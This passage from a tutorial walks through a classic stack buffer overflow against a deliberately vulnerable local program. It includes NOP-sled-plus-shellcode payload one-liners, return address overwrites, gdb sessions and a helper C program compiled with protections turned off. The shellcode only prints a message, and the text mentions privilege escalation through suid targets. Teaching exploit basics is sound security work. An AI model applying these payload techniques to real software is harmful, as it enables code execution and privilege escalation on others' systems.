You can see our shell code neatly nestled right behind our NOP sled. Let's choose an arbitrary memory address in the preceding NOP sled to use as our target, say 0xbffff5f8. Instead of overwriting the eip with B's we'll overwrite it with our target address, which should land code execution in the middle of the NOP sled, then proceed down to our shell code. Because x86 is a little endian architecture, we have to write this address with its bytes in reverse order (if you overlook this then your address won't work), so it becomes:
\xf8\xf5\xff\xbf
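Rather than reversing the bytes by hand, Python's struct module can do the conversion. A minimal sketch, where "<I" asks for a little endian unsigned 32-bit value:

```python
import struct

target = 0xbffff5f8
packed = struct.pack("<I", target)     # little endian, 4 bytes
print("".join("\\x%02x" % b for b in bytearray(packed)))   # \xf8\xf5\xff\xbf
```

Doing it this way avoids transposition mistakes when a different target address has to be tried.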
Now, let's plug this value in for the "BBBB" part in our payload and test it out:
(gdb) shell
$ python -c 'print "A"*268 + "\xf8\xf5\xff\xbf" + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' > input
[justin@localhost ~]$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
now I p0wn your computer
Program exited normally.
And there you have it. Now, at this point the payload will only work in the gdb environment. In order to get it working in the wild we'll have to be a little more creative.
Release the 'Sploit
Now that we've got our shellcode injection and buffer overflow working inside gdb it's time to turn our attention to use of the exploit in the wild. Although our exploit works inside a debugging environment, you might be surprised to learn that it won't actually work at the command line. You can test this like so:
$ python -c 'print "A"*268 + "\xf8\xf5\xff\xbf" + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' | ./blame
Illegal instruction
This is odd since the overflow worked perfectly inside of our debugger. There are a couple of reasons for this. The first is due to the debugger itself. A program started under gdb runs in a slightly different environment (gdb sets extra environment variables and launches the program by its full path), and because this information is stored at the top of the stack, it pushes the addresses used by the blame program away from where they sit in a normal run. An address that lands in our NOP sled inside gdb can therefore miss it entirely at the command line.
The second reason that the exploit won't work involves the way that memory is abstracted for programs to use. Your computer has a whole bunch of memory, probably gigabytes. Although each program gets an allocation of this total memory when it runs, the kernel actually makes the memory appear as though it is solely for the use of a particular program. In other words, the kernel lies to the program. When a program starts up the kernel recognizes the program and reports to the program that it has pretty much all the memory it wants: “Oh sure blame, here's 8 GB of memory, have at it!” In reality the blame program only gets a small fraction of the total memory.
In addition to the lie that the kernel tells programs about how much memory they have, the kernel also does something that is actually designed for convenience. In order to make it easier for programs to run, and access memory, the kernel actually tells programs that not only do they get all the memory that they want, but that they are running at the very bottom of the memory space, and can use all the upward space they want. As we saw before, we're overwriting a memory address around 0xbffff5f8, which is very close to the top of the memory space at 0xffffffff. Our program thinks it has all the memory it wants!
In order to make our exploit work in the wild we're going to have to be a little more careful about how we overflow the buffer. In our work with gdb we were smashing through the allocated 256 byte buffer, over the return pointer, and off into the rest of program memory. We were loading our exploit code into another stack frame entirely, which didn't much matter in our gdb exploit, but it was pretty sloppy. A better strategy would have been to write our NOP sled at the start of our input buffer, place the exploit code next, and use the final four bytes to overwrite the pointer. This would reduce the overall size of our exploit to the 212 byte NOP sled, the 56 bytes of instructions, and a 4 byte overwrite (for a total of 272 bytes). Although this makes a smaller, and neater, exploit it still leaves us the problem of finding an address in our NOP sled. In order to inspect a typical stack layout we can use a simple program that allocates some stack space and then reports on the memory location of that space. Copy in the following program to do just that:
/**** show_sp.c ****/
#include <stdio.h>

int main(void)
{
    char buffer[256];
    char buffer2[6];

    printf("First var: 0x%x\n", &buffer);
    printf("Next var: 0x%x\n", &buffer2);
    return 0;
}
You'll note that by listing the variable name with an ampersand preceding it the output will contain the address of the start of the variable rather than the contents of the variable (its value). Using these two values we can gauge where in memory we will need to point our exploit payload towards. Compile and run this program to get a better idea of what the address space we're looking for will resemble:
$ gcc -fno-stack-protector -z execstack -o show_sp show_sp.c
[justin@localhost ~]$ ./show_sp
First var: 0xbffff520
Next var: 0xbffff51a
These addresses look fairly familiar. Let's try using the First var value (0xbffff520, written in little endian format as the final four bytes of the payload) for our instruction pointer:
$ python -c 'print "\x90"*212 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72" + "\x20\xf5\xff\xbf"' | ./blame
now I p0wn your computer
And the exploit works! Now, this program (and the injected shellcode) was pretty benign, but if we were to change the shellcode to do something more malicious, or if the program had been a suid program (set to run as another user, typically root) then we could have leveraged the privilege escalation to do all sorts of things.
Sources and Recommended Reading:
- Smashing The Stack For Fun And Profit by Aleph One (Phrack 49 - 14)
- Writing buffer overflow exploits - a tutorial for beginners by Mixter
- Shellcoding for Linux and Windows Tutorial by Steve Hanna
- Metasploit Framework Web Console
- Buffer Overflow Tutorial by Preddy - RootShell Security Group
- How Shellcodes Work by Peter Mikhalenko (5/18/2006)
- Buffer Overflows Demystified by Murat Balaban
- Introduction to Buffer Overflow by Ghost_Rider
- Linux Assembly
- Memory Layout and the Stack by Peter Jay Salzman